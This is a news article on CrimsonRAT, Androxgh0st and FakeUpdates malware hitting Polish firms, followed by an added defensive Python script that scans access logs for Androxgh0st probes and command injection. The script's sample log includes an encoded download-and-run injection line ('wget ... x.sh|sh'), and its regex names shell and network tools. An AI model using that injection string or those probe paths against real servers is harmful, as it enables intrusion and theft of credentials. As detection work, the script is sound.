New Malware, CrimsonRAT, Targets Polish Businesses: Infects Over 6% of Enterprises

  • CrimsonRAT, distributed through spam, has attempted to infect over 6 percent of Polish enterprises, making it the most frequently encountered malware in Poland in recent weeks. It gives attackers control of infected computers and can carry out a range of malicious tasks.
  • The two other threats most frequently detected in Poland are the Androxgh0st botnet and the FakeUpdates downloader, both of which have ranked among the most widespread malware in recent months.
  • Globally, FakeUpdates still dominates, affecting 7 percent of organizations worldwide.

CrimsonRAT, a newcomer to the Polish ranking and distributed through spam, has attempted to infect over 6 percent of Polish enterprises, making it the most frequently encountered malware in Poland in recent weeks, warn analysts from Check Point Research. Globally, FakeUpdates still dominates, affecting 7 percent of organizations worldwide.

– CrimsonRAT is a Remote Access Tool (RAT) written in the Java programming language that conceals itself behind legitimate files. It spreads via spam email campaigns containing malicious Microsoft Office documents – explains Wojciech Głażewski, country manager of Check Point in Poland.

CrimsonRAT gives attackers control of infected computers and can carry out a range of malicious tasks. Notably, the tool is not among the most widespread globally: it is detected in fewer than 0.5 percent of corporate networks. In July, however, it was the malware most often targeting Polish companies and internet users.

The other two threats most often detected in Poland are the Androxgh0st botnet and the FakeUpdates downloader, both of which have ranked among the most widespread malware in recent months. Androxgh0st targets Windows, macOS, and Linux hosts. It exploits a range of vulnerabilities, notably in PHPUnit, the Laravel framework, and the Apache web server, and then harvests sensitive information such as Twilio account details, SMTP credentials, and AWS keys. In July, Androxgh0st affected nearly 4 percent of Polish networks. FakeUpdates, third with nearly 3 percent of enterprise networks, is a JavaScript downloader that writes its payloads to disk before launching them; it has been used to deliver further malware such as GootLoader, Dridex, NetSupport, DoppelPaymer, and AZORult.

Globally, a series of new tactics built on FakeUpdates, currently the most prevalent malware worldwide, is cause for alarm. Increasingly, unsuspecting visitors to compromised websites are shown fake browser-update prompts that, in the final stage of the infection chain, install remote access trojans such as AsyncRAT. Experts also point to cybercriminals' abuse of BOINC, a volunteer distributed-computing platform, to gain remote control over infected systems.

Check Point Research analysts report that the most frequently attacked sectors are currently education and research, government and military, and communications. The most frequently exploited vulnerability class is Command Injection Over HTTP (CVE-2021-43936, CVE-2022-24086).
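As an added example (not code from the article or from Check Point Research), the script below triages Apache/nginx combined-format access logs for the two server-side patterns this page mentions: Androxgh0st-style probes for exposed Laravel `.env` files and the PHPUnit `eval-stdin.php` endpoint, and command injection over HTTP. The indicator paths and the shell-metacharacter heuristic are assumptions drawn from public reporting on these threats rather than from the article, and the log lines are constructed for the demonstration.

```python
"""Triage web-server access logs for two patterns named on this page:
Androxgh0st-style credential-harvesting probes (exposed Laravel .env
files, the PHPUnit eval-stdin.php endpoint) and command injection over
HTTP. Added example, not code from the article or Check Point Research;
the indicators are assumptions drawn from public reporting."""
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format, one request per line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed Androxgh0st indicators (not taken from the article): requests for
# a Laravel .env file, which holds AWS/SMTP/Twilio secrets, and for the
# PHPUnit eval-stdin.php script, which executes POSTed PHP when exposed.
ANDROX_PATHS = (
    re.compile(r'(?:^|/)\.env(?:\.\w+)?$'),
    re.compile(r'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php$'),
)

# Heuristic for command injection over HTTP: a shell separator followed by
# a download-and-run utility, a direct shell path, or command substitution.
CMDI_RE = re.compile(
    r'(?:;|\|\|?|&&|`|\$\(|\$\{IFS\})\s*'
    r'(?:wget|curl|sh|bash|nc|chmod|busybox|cat|rm|echo)\b'
    r'|/bin/(?:ba)?sh\b'
    r'|\$\(',
    re.IGNORECASE,
)


def parse(line):
    """Parse one combined-format line into a dict, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(line):
    """Return the tags for one log line: 'androxgh0st-probe',
    'cmd-injection', both, or [] for a benign request. Lines that do not
    parse are tagged 'unparsed' rather than silently dropped."""
    rec = parse(line)
    if rec is None:
        return ["unparsed"]
    # Decode twice: double URL-encoding is a common filter-evasion trick.
    url = unquote(unquote(rec["path"]))
    path = url.split("?", 1)[0]
    tags = []
    if any(p.search(path) for p in ANDROX_PATHS):
        tags.append("androxgh0st-probe")
    if CMDI_RE.search(url):
        tags.append("cmd-injection")
    return tags


def scan(lines):
    """Map line index -> tags for every line that earned at least one tag."""
    return {i: tags for i, line in enumerate(lines) if (tags := classify(line))}


# Constructed sample log (documentation-range IPs); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jul/2024:10:01:02 +0200] "GET /.env HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Jul/2024:10:01:03 +0200] "POST '
    '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" '
    '404 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Jul/2024:10:02:11 +0200] "GET /cgi-bin/status'
    '?cmd=%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx.sh%7Csh HTTP/1.1" '
    '200 13 "-" "curl/8.0"',
    '192.0.2.44 - - [12/Jul/2024:10:03:30 +0200] "GET /index.php?page=home '
    'HTTP/1.1" 200 4096 "https://example.invalid/" "Mozilla/5.0"',
    '192.0.2.45 - - [12/Jul/2024:10:04:00 +0200] "GET /static/environment.css '
    'HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    # Double-encoded "/.env": %2565 -> %65 -> "e".
    '203.0.113.7 - - [12/Jul/2024:10:05:09 +0200] "GET /.%2565nv HTTP/1.1" '
    '404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, tags in scan(SAMPLE_LOG).items():
        rec = parse(SAMPLE_LOG[i])
        print(f"line {i}: {rec['ip']} {rec['method']} {rec['path']} -> {', '.join(tags)}")
```

Run it over a real log by feeding the file's lines to `scan`; the useful pivot is any client that earns the `androxgh0st-probe` tag and then receives a 200 with a non-zero body for `/.env`, which means the secrets the article lists (AWS keys, SMTP and Twilio credentials) were served and should be rotated. The double `unquote` is deliberate, since double-encoded paths slip past single-decode filters; the metacharacter regex is a triage heuristic, not a blocklist, and will need tuning against legitimate query strings on the site in question.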

Source: https://managerplus.pl/cyberprzestepcy-celuja-w-polskie-firmy-crimsonrat-nowym-zagrozeniem-36569
